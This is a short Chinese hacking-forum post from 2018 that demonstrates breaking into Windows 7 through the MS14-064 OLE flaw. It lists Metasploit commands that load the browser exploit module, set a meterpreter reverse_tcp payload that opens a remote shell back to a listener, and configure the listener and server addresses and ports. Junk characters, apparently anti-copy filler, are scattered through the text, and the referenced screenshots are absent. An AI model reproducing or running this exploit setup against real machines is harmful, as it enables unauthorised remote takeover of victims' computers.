找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1579|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, \; H5 u9 G; D- F& U# P 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示. A4 o( \ E' j" t' i

/ b; f( x' _* Q

& _2 g; z, {# M0 V0 X 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: & i9 P5 U1 j( t- i3 F' `( f

4 [- ^9 i4 x1 J, I) c

; p& D1 H' i: O& \0 c# t 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp # N! D6 x' G! a2 b5 p' {/ f

/ H+ ]! s+ ^* _: H

' d$ N+ p* x5 _             set AllowPowershellPrompt true7 R: ~7 @! D- R$ b; p

/ T) n/ d. R# i+ [/ x4 k

' d2 m, J* ]: U3 G             Set LHOST 192.168.0.109. z, A- n- p9 a _/ ^

2 [( B {" N' I! ]

/ m) A+ V0 b, f! I5 b f) K             set SRVHOST 192.168.0.109" O# H& e1 @$ `8 Z! U/ g

4 s9 ]1 A E: K0 s/ x$ b* C

+ m" R2 {8 ~; @# F4 B             Set uripath share7 ]3 `, h0 ?- w& v

$ r2 J+ Q6 s: ]+ L8 t& T

. Z: ], E) r5 V% @; `% K- T             Set srvport 80 4 S+ i) u' j4 T) t; W. s5 P. p2 d

/ S$ m0 t2 j" R4 X

' a# k" Z. g9 Y: ?6 ^( v  ! @' A! `. Z/ ~, f" @

4 m2 K( r! w7 b- L( C f# |

& b _8 j k- P6 M7 q' m. q   ) Z! S' L( x: D5 x% j

/ H$ I3 k- D3 b: h

% U7 D8 C- a# X$ y8 i  0 ?! Y0 v5 ~9 O$ I

0 j1 |: p2 V1 {) d8 T% w

' M1 x/ _7 P" ~+ u; q  5 D# l! M c- K/ J

, Z L( H0 x9 d( X! W

2 X8 M- x% ^$ s& w, ^ `  1 B) i% e$ X) S

2 q) l ], H$ p' b0 O4 [3 u

0 X$ A; q4 L- r 下面我们来访问本地地址如图: 5 V6 j, k1 ^3 w6 n' k# J9 G

9 C/ ~: E( S* ?4 t

4 f r# O) C6 k: G   V& t2 `# z" Y2 Z# E

) d8 {) N9 q( e3 z- k

; e& s. U9 y. b- U' h   # z8 }' z. C3 i! F/ J" P* |

# e/ a8 L4 A5 @' x9 S

7 d% p$ N0 }8 K ( y; p' l0 E* n9 c) ~: ]2 d

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表